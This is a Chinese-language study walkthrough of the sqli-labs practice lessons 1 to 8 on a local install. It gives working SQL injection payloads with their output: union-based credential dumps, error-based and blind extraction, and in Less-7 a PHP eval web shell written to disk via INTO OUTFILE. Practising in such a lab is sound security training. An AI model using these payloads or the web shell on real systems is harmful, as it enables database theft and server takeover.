这是抄袭你们 铃兰师姐总结的,尽管她很不情愿。
(现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!)
less-1:
1、获取当前数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+
SELECT * FROM users WHERE id='' union select 1,2,(select database())-- ' LIMIT 0,1
Your Login name:2
Your Password:security
当前数据库名:security
2、获取所有数据库名
?id=' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+
SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ' LIMIT 0,1
Your Login name:2
Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan
所有数据库名:
information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan
3、获取表名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+
//0x7365637572697479 为数据库名(security)的16进制形式
SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ' LIMIT 0,1
Your Login name:2
Your Password:emails,referers,uagents,users
数据库security中的表名:emails,referers,uagents,users
4、获取列名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+
//0x7573657273 表名:users
SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ' LIMIT 0,1
Your Login name:2
Your Password:id,username,password
列名:id,username,password
5、获取数据
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
//0X7c:空格
SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ' LIMIT 0,1
Your Login name:2
Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4
数据:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4
6、读取数据库路径/获取安装路径
http://localhost/sqli-labs-master/less-1/?id=0' union select 1,@@datadir,@@basedir--+
Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\
Your Password:D:/wamp/bin/mysql/mysql5.6.12
数据库路径:D:\wamp\bin\mysql\mysql5.6.12\data\
mysql安装路径:D:/wamp/bin/mysql/mysql5.6.12
Less-2:
1、获取列数:
http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+
SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1
Unknown column '4' in 'order clause'
(共有三列)
2、获取数据库名称:
http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select database())--+
("id="后面为两个单引号)
SELECT * FROM users WHERE id=' ' union select 1,2,(select database())-- LIMIT 0,1
Your Login name:2
Your Password:security
数据库:security
3、获取所有数据库名称:
http://localhost/sqli-labs-master/less-2/?id=' '
SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1
Your Login name:2 Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan
所有数据库名称:
information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan
4、获取表名称:
http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+
SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1
Your Login name:2
Your Password:emails,referers,uagents,users
表0x7365637572697479(security)中的表有:emails,referers,uagents,users
5、获取列名称:
http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+
SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1
Your Login name:2
Your Password:id,username,password
数据库security中表users的列名称:id,username,password
6、获取表中数据:
http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1
Your Login name:2
Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4
Less-3
1.获取列数:
http://localhost/sqli-labs-master/less-3/?id=1') order by 1,2,3,4--+
SELECT * FROM users WHERE id=('1') order by 1,2,3,4-- ') LIMIT 0,1
Unknown column '4' in 'order clause'
2.@@datadir 读取数据库路径;@@basedir 获取mysql安装路径
http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+
之后方法类似less-1和less-2!!!
Less-4
1、获取列数:
http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+
SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1
Unknown column '4' in 'order clause'
2、获取数据库名称:
http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+
3、所有数据库名称:
http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+
4、获取表名称:
http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+
5、获取列名:
http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+
6、获取数据
http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+
Less-5:(二分法)
1.获取列数:
http://localhost/sqli-labs-master/less-5/?id=' order by 4--+
共四列: Unknown column '4' in 'order clause'
2、报错得到数据库的个数:
http://localhost/sqli-labs-master/less-5/?id=1'+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Duplicate entry '~~:~~11~~:~~1' for key 'group_key'
==>>共十一个数据库
2.报错得到数据库名:
http://localhost/sqli-labs-master/less-5/
?id=1' and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+
Duplicate entry '~~:~~security~~:~~1' for key 'group_key'
==>第九个数据库名为 security
3.报错得到表名:
首先得到表的个数:
/less-5/?id=1' and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
==>Duplicate entry '~~:~~4~~:~~1' for key 'group_key'
共有四个表
依次得到表的名字:
?id=1' and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
Duplicate entry '~~:~~users~~:~~1' for key 'group_key'
2.获取数据库版本号:
http://localhost/sqli-labs-master/less-5/?id=1' and left(version(),1)=5--+
left(string,n)函数:提取字符串string左边的n个字符。
3.利用length()获取数据库长度:
http://localhost/sqli-labs-master/less-5/?id=1' and length(database())=8 --+
数据名长度为8;
4.奇怪:
http://localhost/sqli-labs-master/less-5/?id=1' and length(db())=8 --+
结果:FUNCTION security.db does not exist
5.获取数据库名字:使用二分法获取其各个字母
http://localhost/sqli-labs-master/less-5/?id=1' and left(database(),1) >'s'--+
第一个字母为s;
http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+
前两个字母为se;
依次类推。。。
6.获取数据库security 数据库的第一表的第一个字符:
首先得出数据库的第一个表的长度:
http://localhost/sqli-labs-master//Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+
长度为6;
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>101--+
或
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+
第一个字母为e;
/Less-5/?id=1' and length(select table_name from information_schema.tables where table_schema =database() limit 0,1)>10--+
Less-7 :
1.创建一个木马文件7.php,连接菜刀(必须知道数据库的用户名和密码),然后管理数据库即可得到数据库内容
http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+
less-8:
盲注需要掌握一些MySQL的相关函数:
length(str):返回str字符串的长度。
substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len):跟上面的一样,截取字符串
ascii(str):返回字符串str的最左面字符的ASCII代码值。
ord(str):同上,返回ascii码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0
首先要记得常见的ASCII,A:65,Z:90 a:97,z:122, 0:48, 9:57
首先select database()查询数据库
ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii码
ascii(substr((select database()),1,1))>64:ascii大于64就返回true,if就返回1,否则返回0
ps:(你们铃兰师姐会持续更新的)